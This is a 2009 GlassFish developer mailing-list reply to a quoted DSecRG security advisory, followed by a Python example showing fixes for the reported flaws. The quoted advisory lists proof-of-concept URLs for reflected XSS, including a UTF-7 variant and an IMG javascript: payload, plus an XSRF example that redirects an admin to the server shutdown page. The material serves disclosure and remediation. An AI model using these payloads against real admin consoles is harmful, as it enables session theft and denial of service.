dev@glassfish.java.net

Re: [DSECRG] Sun Glassfish Multiple Security Vulnerabilities

From: Ken Paulsen <Ken.Paulsen_at_Sun.COM>
Date: Sat, 11 Apr 2009 09:00:58 -0700

Hi Everyone,

I'd like to thank The Digital Security Research Group for bringing the
issues listed below to our attention. We immediately began investigating
and fixing these issues as soon as possible, since security is very
important to our community. We have fixes for all of the specific
issues reported, and found many other similar instances which we also
fixed. Here are some comments on our assessment of these issues:

The security risk reported in these issues is exploitable by someone
that emails a crafted link to an authenticated GlassFish admin user, or
finds some other way to trick the user into clicking a crafted link. The
crafted link will contain some code (often JS) that may collect and send
information to the attacker. None of the reported attacks can be
directly executed by the attacker; the victim must click on a malicious
URL while being logged into the Admin console. The chance of a
successful attack for these issues is very small, even if targeting a
large pool of GlassFish admin users. Nonetheless, the threat is a real
security concern. As with any website or web application which may have
private information, it is advisable that you log out when you are no
longer using the console, which will avoid these types of attacks.

There are 3 types of security issues reported: 1.1, 1.2, and 1.3.
Reported Issue #2 is technically identical to issue 1.1, except that it
is a specific example of how to exploit it -- so I did not list it as a
4th type of issue.

1.1:

I have not found any current real-world browsers that make the 1.1
exploit possible (however, I only tried FF 3, IE 6, and Safari -- older
browsers such as Netscape 2/3 are likely to be vulnerable).
Nevertheless, issue 1.1 has been fixed (this includes the original issue
2 scenario).

1.2:

Issue 1.2 is not related to the GlassFish admin console code directly;
it is regarding the handling of the 404 error page by "ThemeServlet" in
project Woodstock. In Woodstock code, when sending a 404 page, they
quote back the request URI in their response - this is a problem. I have
changed their code to NOT do this, so this issue is fixed. I evaluated
all other cases where we throw 404 error messages, including our use of
JSFTemplating, jMaki, other Woodstock cases, Shale, our DownloadServlet,
and JavaServer Faces -- none of these present this same issue. Jan
confirmed that the GlassFish web container handles this properly as well
and does not present a risk.

1.3:

Issue 1.3 fix exists in a number of files and was the easiest to
exploit. We have gone over every file and have made a fix in the
GlassFish code-base which solves this issue in all known cases.

Thanks again for bringing these issues to our attention and helping make
the GlassFish Admin Console a more secure tool for all GlassFish users.

Thanks!

Ken Paulsen & Anissa Lam
GlassFish Developers from the Admin Console Team


DSecRG wrote:
> Hello, We are security researchers from Digital Security company
> [http://dsecrg.com].
> We found a critical vulnerability in your system, Sun Glassfish Enterprise Server.
>
> This advisory is being provided to you under the policy documented at
> http://dsecrg.com/files/DSPolicy_en.pdf. We recommend you to read this policy; however, in the interim, you have 7 days to respond to this initial email. This policy encourages open communication, and we look forward to working with you on resolving the problem detailed below.
>
>
>
> Digital Security Research Group [DSecRG] Advisory #DSECRG-09-0
>
>
> Application: Sun Glassfish Enterprise Server
> Versions Affected: 2.1
> Vendor URL: https://glassfish.dev.java.net/
> Bug: Multiple XSS and XSRF Vulnerabilities
> Exploits: YES
> Reported: 18.03.2009
> Vendor response: ..2009
> Solution: ..
> Date of Public Advisory: ..
> CVE-numbers: ..
> Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
>
>
>
> Description
> ***********
>
> 1. Glassfish Server Admin Console multiple XSS vulnerabilities.
> 2. Glassfish Server Admin Console shutdown server XSRF vulnerability.
>
>
>
> Details
> *******
>
> 1. Glassfish Server Admin Console multiple XSS vulnerabilities.
>
> Using this vulnerability, an attacker can steal the admin's cookie and then
> authenticate as administrator or perform certain administrative
> actions.
>
> 1.1 Multiple Linked XSS vulnerabilities.
>
> Many pages have typical XSS vulnerability.
>
> Attacker can inject XSS in URL string.
>
> Example:
>
> http://[server]/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/configuration/configuration.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/customMBeans/customMBeans.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/resourceNode/resources.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/sysnet/registration.jsf?');};alert("DSecRG_XSS");</script><!--
> http://[server]/webService/webServicesGeneral.jsf?');};alert("DSecRG_XSS");</script><!--
>
> Response HTML Code:
> -------------------
> #################################################
>
> ...
> <script type="text/javascript">
> var myonload = new Object();
> myonload.oldonload = window.onload;
> myonload.newonload = function() {
> if ('/applications/applications.jsf?');};alert("DSecRG_XSS");</script><!--' != '') {
> ...
>
> #################################################
>
>
> 1.2 Multiple Linked XSS vulnerabilities in 404 Error page.
>
> Attacker can inject XSS in URL string using UTF-7 encoding.
>
> Exploiting this issue requires Auto-Select encoding in the browser
> configuration.
>
> Example:
>
> http://[server]/theme/META-INF/>+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7-
>
>
> 1.3 Multiple Linked XSS vulnerabilities in GET parameter "name".
>
> Many pages have typical XSS vulnerability in GET parameter "name".
>
> Attacker can inject XSS in URL string.
>
> Example:
>
> http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
> http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>&configName=server-config
> http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
>
>
> ---------------------------------------------------------------------
>
>
> 2. Glassfish Server Admin Console shutdown server XSRF vulnerability.
>
> Exploiting this issue allows a remote attacker to shut down the server.
>
> Example:
>
> http://[server]/applications/applications.jsf?<script>document.location.href="http://[server]/shutdown.jsf";</script>
>
>
>
> About
> *****
>
> Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
>
>
> Contact: research [at] dsecrg [dot] com
> http://www.dsecrg.com
> http://www.dsec.ru
>
>
> Regards,
> Digital Security Research Group [DSecRG]
> ________________________________________
> DIGITAL SECURITY
> tel/fax: +7(812)703-1547
> tel: +7(812)430-9130
> e-mail: research_at_dsecrg.com
> web: www.dsecrg.com
> ----------------------------------------
> This message and any attachment are confidential and may be privileged
> or otherwise protected from disclosure. If you are not the intended
> recipient any use, distribution, copying or disclosure is strictly
> prohibited. If you have received this message in error, please notify
> the sender immediately either by telephone or by e-mail and delete this
> message and any attachment from your system. Correspondence via e-mail
> is for information purposes only. Digital Security neither makes nor
> accepts legally binding statements by e-mail unless otherwise agreed.
> ----------------------------------------
>
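The three remediations the vendor reply describes, shown side by side with the unsafe pattern from the advisory: encoding the request URI as a proper JavaScript string literal inside the inline onload script (issue 1.1), entity-encoding the "name" parameter in HTML body context (issue 1.3), and a 404 handler that does not echo the request URI and declares an explicit charset so browser auto-select cannot reinterpret the page as UTF-7 (issue 1.2). This is an added Python illustration written for this page, not GlassFish or Woodstock source; the function names are hypothetical and the payload strings are constructed from the shapes quoted in the advisory.

```python
import html
import json

# Constructed inputs modelled on the payload shapes in the quoted advisory:
# a request URI that closes an inline JS string (issue 1.1) and a "name"
# parameter carrying raw HTML (issue 1.3).
JS_CONTEXT_PAYLOAD = "/applications/applications.jsf?');};alert(\"DSecRG_XSS\");</script><!--"
HTML_CONTEXT_PAYLOAD = "<IMG SRC=javascript:alert('DSecRG_XSS')>"


def js_string_literal(value: str) -> str:
    """Encode an untrusted value as a JavaScript string literal for inline
    scripts. json.dumps escapes quotes and backslashes; '<', '>' and '/' are
    then hex-escaped so the HTML parser can never see a closing </script>."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("/", "\\/"))


def onload_script_vulnerable(request_uri: str) -> str:
    # Same pattern as the advisory's "Response HTML Code": the URI is pasted
    # raw into a single-quoted JS string, so ');' ends the string and the code.
    return "<script>if ('%s' != '') { /* ... */ }</script>" % request_uri


def onload_script_hardened(request_uri: str) -> str:
    # The URI becomes a proper JS literal; quotes, ');' and </script> inside
    # it are inert text for both the HTML and the JS parser.
    return "<script>if (%s !== '') { /* ... */ }</script>" % js_string_literal(request_uri)


def name_field_vulnerable(name: str) -> str:
    return "<td>%s</td>" % name


def name_field_hardened(name: str) -> str:
    # HTML body context: entity-encode <, >, & and both quote characters.
    return "<td>%s</td>" % html.escape(name, quote=True)


def not_found_response(request_uri: str):
    """404 handler in the spirit of the Woodstock fix (issue 1.2): the request
    URI is intentionally never written to the body, and an explicit charset
    is declared so a browser set to auto-select encoding cannot reinterpret
    the response as UTF-7. request_uri is accepted but deliberately unused."""
    headers = {"Content-Type": "text/html; charset=UTF-8"}
    body = "<html><body><h1>404 Not Found</h1></body></html>"
    return 404, headers, body
```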